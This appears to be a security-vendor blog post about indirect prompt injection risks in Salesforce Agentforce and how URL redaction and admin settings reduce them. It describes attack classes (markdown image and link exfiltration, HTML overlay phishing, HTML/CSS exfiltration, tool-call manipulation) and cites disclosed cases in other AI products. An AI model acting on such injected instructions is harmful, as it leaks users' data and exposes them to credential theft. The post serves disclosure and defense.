One key way Salesforce mitigates AI risk

What is Agentforce, and what risks does it face?

Agentforce is Salesforce's agentic AI layer. Its agents read CRM records, draft communications, and take actions, returning generated output to users inside the Salesforce web app.

Because those agents act on data they ingest (for example, Web-to-Lead submissions), an attacker who places an indirect prompt injection in that data can manipulate the agent's output to attempt several well-known attacks:

Markdown image-based data exfiltration. If the model is manipulated to output an externally sourced markdown image with user data appended to the URL, data can be exfiltrated as soon as the image renders in chat with no click required. PromptArmor's Threat Intelligence Team disclosed this vulnerability across several apps, including exfiltration of connected data sources from OpenAI's Codex and sensitive emails from Superhuman AI.
Markdown link-based data exfiltration and phishing. A generated link can carry data in its URL or send the user to a credential-harvesting page dressed up as a routine action. PromptArmor demonstrated how Slack AI could be manipulated to present a malicious hyperlink that exfiltrated API keys from private Slack channels when clicked.
HTML overlay phishing. If HTML is not sanitized from agent output, manipulated output can overwrite the user's interface by rendering iFrames of attacker sites. PromptArmor published on this vulnerability, showing how vLex (now Clio) rendered fake login pop-ups. This technique was also used to overwrite the entire user interface in Ollama.
HTML-based data exfiltration. If externally sourced HTML (or CSS) is generated and rendered, with sensitive data appended to the element's source URL, that data can be exfiltrated. This vulnerability was disclosed to and remediated by vLex (now Clio) alongside the HTML overlay exploit, and Ollama also exhibited this risk.
Tool-call manipulation. Any agent that can call tools and interact with data can be manipulated to take actions under the directive of a prompt injection. PromptArmor demonstrated this risk, showing that Copilot Cowork can exfiltrate files from Drive and SharePoint due to a missing human-in-the-loop step, and that ChatGPT for Google Sheets could exfiltrate user workbooks via tool call manipulation.

The first three attacks described above share a key characteristic: an attacker-controlled URL surviving into the agent's rendered output.

The defense: URL redaction

When an agent's response is rendered inside the Salesforce web app, any URL not demarcated as a trusted URL is stripped from the output and replaced with the literal string [URL_REDACTED]. Because Markdown and HTML-based data exfiltration attacks rely on untrusted URLs reaching rendered output, redacting untrusted URLs serves as a powerful defense to reduce the attack surface.

How redaction addresses risks

Attack
How Redacting URLs Mitigates It

Data exfiltration via markdown image

The agent emits a markdown image whose URL carries stolen data to an attacker-controlled server, firing on render.

The untrusted image URL is replaced with [URL_REDACTED], so the browser never makes the request that leaks the data.

Phishing via markdown link

A 'click to reauthenticate' link carries data out or points the user to a fake login.

The clickable link is replaced with [URL_REDACTED], so there is nothing for the user to click.

Data exfiltration via HTML/CSS

An image, iframe, or CSS background in agent-output HTML points at an attacker-controlled domain, firing a request on render.

URLs inside HTML and CSS are redacted too: the attacker-controlled image, iframe, or background source is replaced with [URL_REDACTED] before the markup renders, so the request that would carry the data out is never made.

Phishing via HTML overlay

Injected markup draws an attacker-controlled login screen over the chat to harvest credentials.

The fake login screen has to load attacker-hosted content. With those URLs redacted, it has nothing to load.

This analysis describes Agentforce Chat inside the Salesforce web app. Salesforce ships many more AI features, exposes MCP servers, and presents a large attack surface overall, so URL redaction addresses only a subset of the risk. For example, the agent's ability to call tools in Agentforce requires other defenses, such as human-in-the-loop approval, to prevent attacks like the exploit against Microsoft Copilot Cowork.

Assessing Salesforce AI for your organization?

URL redaction covers one channel. Get the full report on Agentforce's other risks and defenses, and on Salesforce's broader AI attack surface.

Configurations for Salesforce AI output processing

First, we wanted to note that for some use cases, it is necessary to allow certain URLs in model output. To allow specific URLs, configure the following:

Restrict and allowlist output URLs. To allow agents to output external URLs, add each one explicitly:

Setup → Quick Find → "Trusted URLs" → Trusted URLs → New Trusted URL

Avoid wildcard patterns that allow any site hosting user-generated or otherwise untrusted content.
Set CSP directives in the same settings page to disallow img-src unless images are meant to render from the target domain. This reduces the risk of Markdown image-based data exfiltration.

Next, we note several Salesforce settings that reduce the risk surface for indirect prompt injection:

Mask sensitive data in the Einstein Trust Layer.

Masking data works by substituting sensitive data with a placeholder before a prompt is sent to the LLM. This prevents the agent, under the influence of a prompt injection, from taking actions such as encoding sensitive data and appending the encoded result to a malicious URL.

Configure data masking here:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Data Masking → Large Language Model Data Masking

Turn on Large Language Model Data Masking first; it is the parent category, and the options below are only applicable once it is on.

Pattern-based masking is available and can be enabled for the following data types: Name, Email Address, Phone Number, Credit Card, US SSN, US ITIN, US Drivers License, Passport, IBAN Code, and Company Name.

Data Masking → Pattern-based → Sensitive Data

Field-based masking covers fields by compliance category (PII, HIPAA, GDPR, PCI, COPPA, and CCPA) and by data sensitivity level (Public, Internal, Confidential, Restricted, and Mission Critical).

Data Masking → Field-based → Compliance Categories / Data Sensitivity Levels

Prompt injection detection (beta)

Salesforce additionally offers a prompt injection detection setting:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Safety & Security → Prompt Injection Detection

However, this setting is currently in beta and subject to beta terms; as such Salesforce appears to train AI on customer data when prompt injection detection is enabled.

Want to configure every Salesforce AI privacy and security setting?

See all Agentforce and Einstein configurations recommended for your use case

What is Agentforce, and what risks does it face?

The defense: URL redaction

How redaction addresses risks

Configurations for Salesforce AI output processing

Is your organization protected from AI in vendors?